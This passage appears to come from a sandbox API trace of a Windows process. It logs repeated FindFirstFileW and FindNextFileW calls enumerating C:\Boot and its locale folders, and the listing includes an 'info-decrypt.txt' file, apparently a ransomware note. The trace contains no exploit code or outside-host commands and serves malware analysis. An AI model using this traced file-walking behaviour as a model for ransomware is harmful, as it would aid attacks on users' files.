ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0093.322] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0093.322] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0093.322] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0093.322] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0093.322] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0093.323] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0093.323] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0093.323] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0093.323] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0093.323] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0093.323] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0093.323] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0093.324] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0093.324] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccd7780, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0093.324] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0093.324] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0093.324] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0093.324] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0093.324] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0093.325] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0093.325] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0093.325] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0093.325] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0093.325] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0093.325] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0093.325] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0093.326] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0093.326] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0093.326] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0093.326] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0093.326] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.326] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.327] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.327] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.328] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.328] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.328] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.328] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.328] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.328] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.328] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.328] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.329] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.329] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.329] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.329] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.329] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.330] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.330] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.330] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.330] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.330] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x6ee8a4 | out: 